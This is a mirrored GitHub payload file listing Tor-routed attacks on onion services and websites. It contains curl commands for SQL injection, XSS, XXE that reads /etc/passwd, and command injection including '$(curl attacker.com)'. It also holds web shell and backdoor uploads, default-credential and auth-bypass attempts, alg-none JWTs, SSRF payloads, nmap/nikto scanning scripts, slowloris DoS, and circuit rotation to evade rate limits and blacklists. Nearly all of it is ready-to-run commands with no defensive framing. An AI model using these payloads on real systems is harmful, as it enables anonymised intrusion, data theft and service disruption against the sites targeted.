0x5t4l1n/hunting
1
0
Fork 0
mirror of https://github.com/0x5t4l1n/hunting.git synced 2026-05-26 11:35:51 +00:00
Code Issues Packages Projects Releases Wiki Activity
Files
main
hunting/Tor-Based-Attacks/tor-based-payloads.txt
T

445 lines
13 KiB
Plaintext
Raw Permalink Blame History

# Tor-Based Attack Payloads
# ============================================
# 1. TOR CONNECTION SETUP
# ============================================
# Tor SOCKS proxy configuration
SOCKS_PROXY=socks5h://127.0.0.1:9050
HTTP_PROXY=http://127.0.0.1:8118 # Polipo/Privoxy
# Test Tor connection
curl --socks5-hostname 127.0.0.1:9050 https://check.torproject.org/
curl --socks5-hostname 127.0.0.1:9050 https://icanhazip.com
# ============================================
# 2. TOR EXIT NODE LIST CHECKING
# ============================================
# Get Tor exit node list
curl https://check.torproject.org/torbulkexitlist
# Check if IP is Tor exit node
curl "https://check.torproject.org/cgi-bin/TorBulkExitList.py?ip=TARGET_IP"
# DNS-based Tor exit node check
# Query: REVERSE_IP.REVERSE_TARGET_IP.ip-port.exitlist.torproject.org
# Example: dig 1.0.0.127.80.1.0.168.192.ip-port.exitlist.torproject.org
# ============================================
# 3. RATE LIMITING BYPASS
# ============================================
# Rotate Tor circuits for new IP
# Using stem library
# controller.signal(Signal.NEWNYM)
# Automated requests with circuit rotation
# Request 1-10 with IP A
# Rotate circuit (get new IP)
# Request 11-20 with IP B
# Continue...
# Testing rate limits
for i in {1..100}; do
curl --socks5-hostname 127.0.0.1:9050 https://example.com/api/endpoint
# Rotate every 10 requests
if [ $((i % 10)) -eq 0 ]; then
killall -HUP tor
sleep 5
fi
done
# ============================================
# 4. ONION SERVICE ENUMERATION
# ============================================
# Common onion service patterns
http://*.onion
http://*.onion/admin
http://*.onion/login
http://*.onion/panel
http://*.onion/api
# Known onion services for testing
http://3g2upl4pq6kufc4m.onion (DuckDuckGo)
http://thehiddenwiki.onion
http://darknetlive.onion
# Subdirectory enumeration
/admin
/panel
/dashboard
/api
/login
/register
/upload
/download
/files
# ============================================
# 5. ONION SERVICE SCANNING
# ============================================
# Port scanning through Tor
proxychains nmap -sT -Pn -p 80,443,8080 example.onion
# Service detection
proxychains nmap -sV -p 80 example.onion
# Directory bruteforce
gobuster dir --proxy socks5://127.0.0.1:9050 -u http://example.onion -w wordlist.txt
# Nikto scan
proxychains nikto -h http://example.onion
# ============================================
# 6. TOR BROWSER FINGERPRINTING EVASION
# ============================================
# Tor Browser User-Agent strings
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:102.0) Gecko/20100101 Firefox/102.0
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
# Standard Tor Browser headers
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
# ============================================
# 7. HIDDEN SERVICE AUTHENTICATION TESTING
# ============================================
# Test default credentials on onion services
curl --socks5-hostname 127.0.0.1:9050 http://example.onion/login -d "username=admin&password=admin"
curl --socks5-hostname 127.0.0.1:9050 http://example.onion/login -d "username=admin&password=password"
curl --socks5-hostname 127.0.0.1:9050 http://example.onion/login -d "username=administrator&password=administrator"
# Authentication bypass attempts
curl --socks5-hostname 127.0.0.1:9050 http://example.onion/admin
curl --socks5-hostname 127.0.0.1:9050 http://example.onion/admin -H "Authorization: Bearer null"
curl --socks5-hostname 127.0.0.1:9050 http://example.onion/admin -H "Cookie: admin=true"
# ============================================
# 8. SSRF TO INTERNAL ONION SERVICES
# ============================================
# SSRF payloads targeting onion services
url=http://internal.onion
url=http://admin.onion
url=http://localhost.onion
url=http://192.168.1.1.onion
# Testing internal onion service access
{"webhook_url": "http://internal.onion/api"}
{"callback": "http://admin-panel.onion"}
# ============================================
# 9. SQL INJECTION ON ONION SERVICES
# ============================================
# Test SQLi through Tor
curl --socks5-hostname 127.0.0.1:9050 "http://example.onion/page?id=1' OR '1'='1"
curl --socks5-hostname 127.0.0.1:9050 "http://example.onion/search?q=test' UNION SELECT NULL--"
# Automated SQLi testing
sqlmap -u "http://example.onion/page?id=1" --tor --tor-type=SOCKS5 --check-tor
# ============================================
# 10. XSS ON ONION SERVICES
# ============================================
# XSS payloads for onion services
<script>alert(document.domain)</script>
<img src=x onerror=alert(document.cookie)>
<svg/onload=alert(1)>
# Reflected XSS testing
curl --socks5-hostname 127.0.0.1:9050 "http://example.onion/search?q=<script>alert(1)</script>"
# ============================================
# 11. COMMAND INJECTION ON ONION SERVICES
# ============================================
# Command injection payloads
; whoami
| ls -la
` cat /etc/passwd`
$(curl attacker.com)
# Testing command injection
curl --socks5-hostname 127.0.0.1:9050 "http://example.onion/ping?host=127.0.0.1; whoami"
# ============================================
# 12. FILE UPLOAD ON ONION SERVICES
# ============================================
# Upload malicious files through Tor
curl --socks5-hostname 127.0.0.1:9050 -F "file=@shell.php" http://example.onion/upload
curl --socks5-hostname 127.0.0.1:9050 -F "file=@backdoor.jsp" http://example.onion/upload
# ============================================
# 13. TOR CIRCUIT MANIPULATION
# ============================================
# Request specific exit nodes
# In torrc:
ExitNodes {US}
StrictNodes 1
# Avoid specific exit nodes
ExcludeExitNodes {CN},{RU}
# Use specific entry guards
EntryNodes $fingerprint1,$fingerprint2
# ============================================
# 14. TIMING ATTACKS THROUGH TOR
# ============================================
# Measure response times for timing attacks
for i in {1..100}; do
TIME=$(curl --socks5-hostname 127.0.0.1:9050 -w "%{time_total}" -o /dev/null -s "http://example.onion/login?user=admin")
echo "Request $i: $TIME seconds"
done
# ============================================
# 15. ONION SERVICE DOS
# ============================================
# Stress testing onion service
ab -X 127.0.0.1:8118 -n 10000 -c 100 http://example.onion/
# Slowloris through Tor
slowloris --proxy 127.0.0.1:9050 example.onion
# ============================================
# 16. EXIT NODE DETECTION BYPASS
# ============================================
# Rotate circuits to bypass blacklists
# After each blocked request, get new circuit
killall -HUP tor
sleep 5
# Retry request
# Use bridges to hide Tor usage
# In torrc:
UseBridges 1
Bridge obfs4 IP:PORT FINGERPRINT
# ============================================
# 17. ONION SERVICE DISCOVERY
# ============================================
# Search for onion services
# Ahmia.fi search API
curl "https://ahmia.fi/search/?q=keyword"
# Dark web search engines
# notEvil: http://hss3uro2hsxfogfq.onion
# Torch: http://xmh57jrzrnw6insl.onion
# ============================================
# 18. HIDDEN SERVICE DESCRIPTOR ATTACKS
# ============================================
# Query hidden service descriptor
# HSDir servers store descriptors
# Descriptor ID calculated from onion address
# Monitor descriptor uploads
# Timing analysis on descriptor publication
# ============================================
# 19. TOR BROWSER EXPLOIT TESTING
# ============================================
# JavaScript exploits targeting Tor Browser
<script>
// Attempt to detect Tor Browser
if (navigator.userAgent.includes('Firefox')) {
// Tor Browser specific behavior
}
// Canvas fingerprinting (blocked in Tor Browser)
var canvas = document.createElement('canvas');
// Will return generic fingerprint in Tor Browser
</script>
# ============================================
# 20. ONION SERVICE API TESTING
# ============================================
# API endpoint enumeration
curl --socks5-hostname 127.0.0.1:9050 http://example.onion/api/v1/
curl --socks5-hostname 127.0.0.1:9050 http://example.onion/api/v2/
curl --socks5-hostname 127.0.0.1:9050 http://example.onion/api/users
curl --socks5-hostname 127.0.0.1:9050 http://example.onion/api/admin
# GraphQL on onion services
curl --socks5-hostname 127.0.0.1:9050 http://example.onion/graphql \
-H "Content-Type: application/json" \
-d '{"query":"{__schema{types{name}}}"}'
# ============================================
# 21. TOR BRIDGE ENUMERATION
# ============================================
# Request bridges from BridgeDB
curl https://bridges.torproject.org/
# Test bridge connectivity
# In torrc:
UseBridges 1
Bridge obfs4 BRIDGE_IP:PORT FINGERPRINT cert=CERT iat-mode=0
# ============================================
# 22. ONION SERVICE CORS MISCONFIGURATION
# ============================================
# Test CORS on onion services
curl --socks5-hostname 127.0.0.1:9050 http://example.onion/api \
-H "Origin: http://attacker.onion"
# Check CORS headers
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: true
# ============================================
# 23. WEBSOCKET ON ONION SERVICES
# ============================================
# WebSocket connections through Tor
wscat --proxy socks5://127.0.0.1:9050 -c ws://example.onion/ws
# Test WebSocket security
{"type":"auth","token":"' OR '1'='1"}
# ============================================
# 24. ONION SERVICE IDOR
# ============================================
# Test IDOR on onion services
curl --socks5-hostname 127.0.0.1:9050 http://example.onion/api/user/1
curl --socks5-hostname 127.0.0.1:9050 http://example.onion/api/user/2
curl --socks5-hostname 127.0.0.1:9050 http://example.onion/api/user/999
# ============================================
# 25. TOR CONSENSUS MANIPULATION
# ============================================
# Download Tor consensus
curl https://collector.torproject.org/recent/relay-descriptors/consensuses/
# Analyze relay information
# Identify potential malicious relays
# ============================================
# 26. ONION SERVICE JWT ATTACKS
# ============================================
# Test JWT on onion services
curl --socks5-hostname 127.0.0.1:9050 http://example.onion/api \
-H "Authorization: Bearer eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJzdWIiOiJhZG1pbiJ9."
# JWT weak secret
# Brute force JWT secret on onion service
# ============================================
# 27. ONION SERVICE XXE
# ============================================
# XXE payload for onion services
curl --socks5-hostname 127.0.0.1:9050 http://example.onion/api \
-H "Content-Type: application/xml" \
-d '<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>'
# ============================================
# 28. ONION SERVICE SSRF
# ============================================
# SSRF payloads targeting internal onion services
{"url": "http://internal.onion"}
{"url": "http://127.0.0.1:9050"}
{"url": "http://localhost"}
# ============================================
# 29. TOR DIRECTORY AUTHORITY MONITORING
# ============================================
# Monitor directory authorities
# 9 directory authorities in Tor network
# moria1, tor26, dizum, gabelmoo, maatuska, longclaw, bastet, faravahar, Serge
# Query directory authority
curl http://128.31.0.34:9131/tor/status-vote/current/consensus
# ============================================
# 30. ONION SERVICE SECURITY HEADERS
# ============================================
# Check security headers on onion services
curl --socks5-hostname 127.0.0.1:9050 -I http://example.onion
# Missing security headers:
# Strict-Transport-Security
# X-Content-Type-Options
# X-Frame-Options
# Content-Security-Policy
# ============================================
# PYTHON TOR AUTOMATION EXAMPLES
# ============================================
# Python with Tor SOCKS proxy
import requests
proxies = {
'http': 'socks5h://127.0.0.1:9050',
'https': 'socks5h://127.0.0.1:9050'
}
response = requests.get('http://example.onion', proxies=proxies)
# Python with Stem (Tor controller)
from stem import Signal
from stem.control import Controller
with Controller.from_port(port=9051) as controller:
controller.authenticate()
controller.signal(Signal.NEWNYM) # New identity
# ============================================
# BASH TOR AUTOMATION EXAMPLES
# ============================================
# Rotate Tor identity
killall -HUP tor
# Check current Tor IP
curl --socks5-hostname 127.0.0.1:9050 https://icanhazip.com
# Automated onion service scanner
#!/bin/bash
ONIONS=("example1.onion" "example2.onion" "example3.onion")
for onion in "${ONIONS[@]}"; do
echo "Scanning $onion"
proxychains nmap -sT -Pn -p 80,443 $onion
proxychains nikto -h http://$onion
done
# ============================================
# TOR CIRCUIT INFORMATION
# ============================================
# Get current circuit info
# Using Tor control port (9051)
echo -e 'AUTHENTICATE ""\r\nGETINFO circuit-status\r\nQUIT' | nc 127.0.0.1 9051
# Monitor circuit creation
# Using stem library to get real-time circuit events
Reference in New Issue View Git Blame Copy Permalink